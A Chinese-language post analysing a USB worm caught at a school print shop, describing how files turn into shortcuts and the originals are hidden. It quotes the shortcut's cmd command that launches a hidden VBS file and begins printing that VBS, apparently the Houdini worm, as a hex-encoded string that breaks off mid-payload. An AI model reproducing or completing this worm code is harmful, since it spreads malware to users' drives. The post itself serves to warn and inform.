贵学校打印店病毒的分析.docxVIP

以后去打印店要注意呀、、 昨天去打印店打印作业，打印完之后就没有再往自己电脑上插U盘，今天去讲台上复制PPT 发现中招了。。_ 中招之后的情况是这样的、 所有的文件都变成了 快捷方式，而原始文件都被修改为系统文件 被隐藏了！没有被删除所以危害并不是特别大。。 随便打开一个被感染的快捷方式 可以发现 快捷方式通过CMD 运行 U盘里的rptbsbdrwa..vbs并且打来被隐藏的文件 后退出 所以 那个VBS 就应该是 病毒或恶意程序了 C:\Windows\system32\cmd.exe /c start rptbsbdrwa..vbsstart CUDA.pdfexit 让我们 再 打开那个VBS 看看。。。  要看到那些被隐藏的文件 和那个病毒文件 需要 再文件夹选项里 把这个 选项去掉。 这是我们全部的文件都可以看到了。。 就是他！！！！那个vbs 下边是 恶意文件的 代码： Safa7_22 =273C5B207265636F646572203A20686F7564696E692028632920736B797065203A20686F7564696E692D6678205D3E0D0A0D0A273D2D3D2D3D2D3D2D3D20636F6E666967203D2D3D2D3D2D3D2D3D2D3D2D3D2D3D2D3D2D3D2D3D2D3D2D3